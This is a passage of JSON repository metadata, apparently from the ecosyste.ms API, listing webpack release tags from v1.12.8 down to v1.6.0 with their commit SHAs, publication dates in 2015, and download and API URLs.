ags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack